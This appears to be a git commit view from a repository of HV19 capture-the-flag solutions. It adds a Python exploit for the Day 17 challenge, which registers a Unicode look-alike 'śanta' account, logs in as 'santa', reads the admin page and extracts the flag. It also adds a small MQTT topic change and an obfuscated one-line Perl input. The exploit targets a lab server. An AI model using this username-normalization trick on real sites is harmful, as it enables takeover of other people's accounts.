Browse Source

Day17 code

Roman Hergenreder 4 years ago
parent
commit
5267a8d008
5 changed files with 37 additions and 1 deletions
  1. 1 1
      Day 15/exploit.py
  2. 0 0
      Day 16/decode.py
  3. 33 0
      Day 17/exploit.py
  4. 2 0
      Day 17/source.phps
  5. 1 0
      Hidden 04/input.pl

+ 1 - 1
Day 15/exploit.py

@@ -7,7 +7,7 @@ import logging
 
 def on_connect(client, userdata, flags, rc):
     if rc == 0:
-        path = 'HV19/#';
+        path = 'HV19/gifts/#';
         client.subscribe(path, qos=0)
 
 def on_message(client, userdata, msg):

+ 0 - 0
Day 16/debug.py → Day 16/decode.py


+ 33 - 0
Day 17/exploit.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python
+
+import requests
+import random
+import string
+import re
+
+BASE_URL = "http://whale.hacking-lab.com:8881"
+PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
+SESSION = requests.session()
+FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
+
+# 1. register user santa
+res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
+if res.status_code != 200 or "Registration successful!" not in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 2. login
+res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 3. get flag
+res = SESSION.get(BASE_URL + "/admin.php")
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    exit(1)
+
+print(FLAG_PATTERN.search(res.text))

File diff suppressed because it is too large
+ 2 - 0
Day 17/source.phps


+ 1 - 0
Hidden 04/input.pl

@@ -0,0 +1 @@
+s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee

Some files were not shown because too many files changed in this diff